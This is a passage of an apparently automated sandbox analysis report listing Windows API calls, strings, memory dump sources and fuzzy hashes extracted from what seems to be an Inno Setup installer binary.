                                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                  • API String ID: 2610873146-3407710046
                                                                                  • Opcode ID: f4d6e5fad0b29dbe73c49a3dd9bbec29a3ac53327e7f71340f51527231a6598f
                                                                                  • Instruction ID: 79ef3469d7d3f88cabd24b86f5758d16992ed885f8e8d733778c3d92ea40af4d
                                                                                  • Opcode Fuzzy Hash: f4d6e5fad0b29dbe73c49a3dd9bbec29a3ac53327e7f71340f51527231a6598f
                                                                                  • Instruction Fuzzy Hash: F6219276B05A046BD600DE68CD81F7B3799DB88F14F09052AF944DB3C2EAB8ED004B5A
                                                                                  APIs
                                                                                  • GetActiveWindow.USER32 ref: 0042F1F4
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F208
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F215
                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F222
                                                                                  • GetWindowRect.USER32(?,00000000), ref: 0042F26E
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F2AC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                  • API String ID: 2610873146-3407710046
                                                                                  • Opcode ID: 7dac0dfa7658a4558a2e8796b90453688b6c981995994b626f0caacaebe10860
                                                                                  • Instruction ID: cafee556b4ff86616240ec82e2754e32886365cebaf319099c414f584e750c92
                                                                                  • Opcode Fuzzy Hash: 7dac0dfa7658a4558a2e8796b90453688b6c981995994b626f0caacaebe10860
                                                                                  • Instruction Fuzzy Hash: 3421D77A704614ABD300D664DD81F3B33E4DB89B14F89057AFD40DB381DA79DC084BA9
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458EA3,?,00000000,00458F06,?,?,02123858,00000000), ref: 00458D21
                                                                                  • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458E38,?,00000000,00000001,00000000,00000000,00000000,00458EA3), ref: 00458D7E
                                                                                  • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458E38,?,00000000,00000001,00000000,00000000,00000000,00458EA3), ref: 00458D8B
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458DD7
                                                                                  • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458E11,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458E38,?,00000000), ref: 00458DFD
                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000001,00458E11,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458E38,?,00000000), ref: 00458E04
                                                                                    • Part of subcall function 00453510: GetLastError.KERNEL32(00000000,004540A5,00000005,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D,00000000), ref: 00453513
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                  • String ID: CreateEvent$TransactNamedPipe
                                                                                  • API String ID: 2182916169-3012584893
                                                                                  • Opcode ID: 98c2342ffc13102a86a2f4ad38db514fb9186628fbfdf3c783b7ad9eec6d73f4
                                                                                  • Instruction ID: b755420f5ccc64554a28e8d5f72de5b6a69c50c517f2f1d69fd7c456eb535d6c
                                                                                  • Opcode Fuzzy Hash: 98c2342ffc13102a86a2f4ad38db514fb9186628fbfdf3c783b7ad9eec6d73f4
                                                                                  • Instruction Fuzzy Hash: 4A417371A00608EFDB15DF95CD81F9EB7F9EB48715F10406AF904E7292DA789E44CB28
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456F2D,?,?,00000031,?), ref: 00456DF0
                                                                                  • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456DF6
                                                                                  • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456E43
                                                                                    • Part of subcall function 00453510: GetLastError.KERNEL32(00000000,004540A5,00000005,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D,00000000), ref: 00453513
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                  • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                  • API String ID: 1914119943-2711329623
                                                                                  • Opcode ID: 7b1ec654037b0c607dfe6d04a3082381f0cbc5cf9cb070b5b8bf219295e165cb
                                                                                  • Instruction ID: 2b224e74544e423aed3b5227b18181137566e670263372cbc00570a3e14d3cd7
                                                                                  • Opcode Fuzzy Hash: 7b1ec654037b0c607dfe6d04a3082381f0cbc5cf9cb070b5b8bf219295e165cb
                                                                                  • Instruction Fuzzy Hash: 2B319275A00504AFDB11EFAACC42D5FB7BEEB89705752846AF804D3652DA38DD04CB28
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047EB60,00000000), ref: 0042E451
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047EB60,00000000), ref: 0042E4A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressCloseHandleModuleProc
                                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                  • API String ID: 4190037839-2401316094
                                                                                  • Opcode ID: 1af4437276b931ae032a2a4a3ca7a17fb9f1546afc1d5d26d282f18a110b0504
                                                                                  • Instruction ID: 3fe9fe372c4d794b24d5987f6434f9a2f248a379bc076d0360e6e1ac237d63e0
                                                                                  • Opcode Fuzzy Hash: 1af4437276b931ae032a2a4a3ca7a17fb9f1546afc1d5d26d282f18a110b0504
                                                                                  • Instruction Fuzzy Hash: 16216430B10219BBCB10EAF7DC45A9E77A8EB04308FA04877A500E7281EB7CDE459B5D
                                                                                  APIs
                                                                                  • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                  • SaveDC.GDI32(?), ref: 00416E37
                                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                  • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                  • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                  • DeleteObject.GDI32(?), ref: 00416F32
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                  • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                  • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                  • String ID:
                                                                                  • API String ID: 375863564-0
                                                                                  • Opcode ID: db6c70493318213a3b2cdd544b125370fd54b269ad31cfd686a9519e7a86e3c4
                                                                                  • Instruction ID: c727efbf8946963a4c0451e641fd5f3f57076e2c2b79ed229a1c60f75d7412ee
                                                                                  • Opcode Fuzzy Hash: db6c70493318213a3b2cdd544b125370fd54b269ad31cfd686a9519e7a86e3c4
                                                                                  • Instruction Fuzzy Hash: A0513AB12047455FDB50EF69C8C4B9B77E8AF48314F1546AAFD488B286C738EC81CB99
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                  • String ID:
                                                                                  • API String ID: 1694776339-0
                                                                                  • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                  • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                  • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                  • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                  APIs
                                                                                  • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                  • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                  • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Delete$EnableItem$System
                                                                                  • String ID:
                                                                                  • API String ID: 3985193851-0
                                                                                  • Opcode ID: b2f1750b03ba79d273c55ca6812263c276687b20c7bac49dc024d7f30c6f7dfa
                                                                                  • Instruction ID: efa19709b170cd1c2d0de868379c086f5835f405e594c588ded1d161c250978f
                                                                                  • Opcode Fuzzy Hash: b2f1750b03ba79d273c55ca6812263c276687b20c7bac49dc024d7f30c6f7dfa
                                                                                  • Instruction Fuzzy Hash: 112124703807447AE720E725CD8BF9B7BD89B04718F5440A9BA48BF2D3C6F9AA40865C
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(10000000), ref: 00481EF5
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00481F09
                                                                                  • SendNotifyMessageA.USER32(00020434,00000496,00002710,00000000), ref: 00481F7B
                                                                                  Strings
                                                                                  • DeinitializeSetup, xrefs: 00481DF1
                                                                                  • Restarting Windows., xrefs: 00481F56
                                                                                  • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481F2A
                                                                                  • Deinitializing Setup., xrefs: 00481D56
                                                                                  • GetCustomSetupExitCode, xrefs: 00481D95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary$MessageNotifySend
                                                                                  • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                  • API String ID: 3817813901-1884538726
                                                                                  • Opcode ID: c898f3fadde3ff7955209d5f4aceb7b29c199a3380d9c61b05ec390ed495ea4d
                                                                                  • Instruction ID: 9e00769445d4a0c849b2d818ef4b464354af313f5be9db4beddfa23a64d09d3b
                                                                                  • Opcode Fuzzy Hash: c898f3fadde3ff7955209d5f4aceb7b29c199a3380d9c61b05ec390ed495ea4d
                                                                                  • Instruction Fuzzy Hash: 0C518031A04200AFD715EF69D845B5E7BA8EB19318F50887BF905C72B1D738A845CB59
                                                                                  APIs
                                                                                  • SHGetMalloc.SHELL32(?), ref: 0046176F
                                                                                  • GetActiveWindow.USER32 ref: 004617D3
                                                                                  • CoInitialize.OLE32(00000000), ref: 004617E7
                                                                                  • SHBrowseForFolder.SHELL32(?), ref: 004617FE
                                                                                  • CoUninitialize.OLE32(0046183F,00000000,?,?,?,?,?,00000000,004618C3), ref: 00461813
                                                                                  • SetActiveWindow.USER32(?,0046183F,00000000,?,?,?,?,?,00000000,004618C3), ref: 00461829
                                                                                  • SetActiveWindow.USER32(?,?,0046183F,00000000,?,?,?,?,?,00000000,004618C3), ref: 00461832
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                  • String ID: A
                                                                                  • API String ID: 2684663990-3554254475
                                                                                  • Opcode ID: c8a2995f1564064eb5a34001aee608c8ce9a85b4cfccd82670955085ca8b405e
                                                                                  • Instruction ID: ed33581d6f83e257b2021294155b7b183ce5e349162e4ad67cdd841697ea343d
                                                                                  • Opcode Fuzzy Hash: c8a2995f1564064eb5a34001aee608c8ce9a85b4cfccd82670955085ca8b405e
                                                                                  • Instruction Fuzzy Hash: DD31F0B1E00248AFDB11EFA6D885A9EBBF8EB09304F55447BF804E7251E7785A04CB59
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00472CB5,?,?,?,00000008,00000000,00000000,00000000,?,00472F11,?,?,00000000,00473194), ref: 00472C18
                                                                                    • Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A
                                                                                    • Part of subcall function 00406F60: DeleteFileA.KERNEL32(00000000,0049C628,00498DC9,00000000,00498E1E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F6B
                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472CB5,?,?,?,00000008,00000000,00000000,00000000,?,00472F11), ref: 00472C8F
                                                                                  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472CB5,?,?,?,00000008,00000000,00000000,00000000), ref: 00472C95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                  • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                  • API String ID: 884541143-1710247218
                                                                                  • Opcode ID: 66cca181f9b721833913324fb941b36821abb62f62904710aeac79635de6a3b1
                                                                                  • Instruction ID: 65975e4bd8cd76c9bb0fe38812e038ff2f06eb36f2e037c13b6dabf628133507
                                                                                  • Opcode Fuzzy Hash: 66cca181f9b721833913324fb941b36821abb62f62904710aeac79635de6a3b1
                                                                                  • Instruction Fuzzy Hash: 9511D0307005147FD712EA759E82B9E76ACDB59714F61853BB804A72C1DBBCAE02866C
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D365
                                                                                  • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D375
                                                                                  • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D385
                                                                                  • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D395
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                  • API String ID: 190572456-3516654456
                                                                                  • Opcode ID: dc90f1f262602021e393954f48f97557164b85cd901e8b5ff6cac9b118bc13cf
                                                                                  • Instruction ID: a094d50e791027cbd3930c6bcb0dd8b00ad2176992dcb97735ddb1afc71f87fe
                                                                                  • Opcode Fuzzy Hash: dc90f1f262602021e393954f48f97557164b85cd901e8b5ff6cac9b118bc13cf
                                                                                  • Instruction Fuzzy Hash: 170128B0D00700DAE324DF36AC4272636A5EFA430EF14903BAD48962B7D779485B9A2D
                                                                                  APIs
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041AA03
                                                                                  • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                  • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                  • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$StretchText
                                                                                  • String ID:
                                                                                  • API String ID: 2984075790-0
                                                                                  • Opcode ID: 346bdf56f45da54f900b88fa69c46fff65611cbab2d21c5c69379b94b51b0a6c
                                                                                  • Instruction ID: 3742fc556daaed9ad14d930c470d40cb5efd251a519f467f7f8e710c3ba79c5e
                                                                                  • Opcode Fuzzy Hash: 346bdf56f45da54f900b88fa69c46fff65611cbab2d21c5c69379b94b51b0a6c
                                                                                  • Instruction Fuzzy Hash: A561E5B5A00105EFCB40EFA9D985E9ABBF8EF08314B108166F518DB261CB34ED50CF99
                                                                                  APIs
                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458320,?, /s ",?,regsvr32.exe",?,00458320), ref: 00458292
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseDirectoryHandleSystem
